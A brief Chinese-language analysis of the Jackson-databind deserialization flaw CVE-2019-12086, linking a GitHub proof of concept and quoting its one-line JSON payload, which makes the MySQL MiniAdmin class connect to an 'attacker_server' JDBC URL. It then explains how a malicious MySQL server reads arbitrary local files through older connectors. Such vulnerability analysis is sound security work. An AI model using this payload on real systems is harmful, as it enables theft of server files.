Jackson-CVE-2019-12086的反序列化漏洞,看到GitHub放出了Payload,这里这个简单的跟踪分析。

    GitHub地址: https://github.com/c0d3p1ut0s/CVE-2019-12086-jackson-databind-file-read/blob/master/README.md


    网上放出的Payload如下:

    1. ["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]

    安装网上的分析:

    1. 1、在开启Default Typing的情况下,jackson在反序列化json时,可以反序列化指定类,且可以指定一个基础类型的值作为这个类的构造函数的参数的值。2com.mysql.cj.jdbc.admin.MiniAdmin的构造函数接受一个string的值,这个值代表jdbcURL3com.mysql.cj.jdbc.admin.MiniAdmin类在初始化会连接这个jdbcURL中指定的MySQL数据库。4、在mysql-connector-java 8.0.15版本(2019.2.1发布)以下,恶意MySQL服务器可以读取MySQL客户端的任意本地文件,从而导致漏洞产生。